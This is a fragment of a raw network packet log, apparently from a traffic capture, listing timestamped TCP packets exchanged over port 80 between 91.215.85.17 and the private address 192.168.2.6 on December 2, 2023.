                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170797110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170810938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170821905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170833111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170841932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170856953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170859098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170881033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170902967 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170912027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170945883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170960903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.170974970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171010017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171025038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171037912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171061039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171073914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171132088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171144009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171155930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171180010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171201944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171217918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171231031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171255112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171267033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171278954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171303034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171369076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171385050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171396017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171407938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171426058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171448946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171449900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171463013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171485901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171498060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171520948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171542883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171554089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171616077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171627998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171642065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171653032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171670914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171694040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171696901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171710968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171730995 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171731949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171782970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171814919 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171840906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171853065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171864033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171884060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171897888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171982050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.171996117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172008991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172020912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172033072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172044039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172051907 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172056913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172080040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172116995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172132969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172143936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172156096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172174931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172216892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172230959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172241926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172254086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172266960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172281027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172291994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172316074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172317028 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172331095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172362089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172364950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172386885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172454119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172466040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172480106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172492981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172509909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.172533035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.175076008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.175843000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357285976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357343912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357382059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357420921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357461929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357475042 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357497931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357549906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.357549906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375086069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375103951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375116110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375129938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375143051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375155926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375197887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375201941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.375284910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385729074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385760069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385772943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385818958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385833979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385858059 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385864019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385879040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385891914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385904074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385930061 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385948896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385951042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385974884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.385994911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386048079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386120081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386132956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386146069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386166096 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386193991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386543989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386559010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386571884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386584997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386610985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386610985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386749983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386765003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386809111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386815071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386821985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386871099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386887074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386936903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386954069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386967897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386977911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.386991024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387003899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387016058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387016058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387028933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387036085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387041092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387061119 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387078047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387084961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387120008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387139082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387187958 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387244940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387259007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387270927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387284994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387331963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387358904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387372017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387382984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387396097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387406111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387430906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387461901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387475014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387486935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387499094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387511015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387521029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387546062 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387564898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387569904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387720108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387767076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387878895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387892962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387904882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387917042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387928009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387940884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387939930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387953043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387959957 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.387979031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388003111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388005018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388039112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388042927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388056993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388089895 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388120890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388134956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388169050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388180971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388181925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388209105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388215065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388272047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388320923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388341904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388355970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388367891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388381004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388410091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388410091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388442993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388467073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388487101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388518095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388530970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388575077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388576031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388588905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388601065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388633013 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388643026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388653040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388659000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388684034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388698101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388710022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388721943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388727903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388750076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388777971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388782024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388796091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388808012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388820887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388833046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388840914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388859987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388895035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388909101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388920069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388938904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.388966084 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389117956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389300108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389313936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389324903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389338017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389354944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389385939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389400005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389403105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389447927 CET4972080192.168.2.691.215.85.17
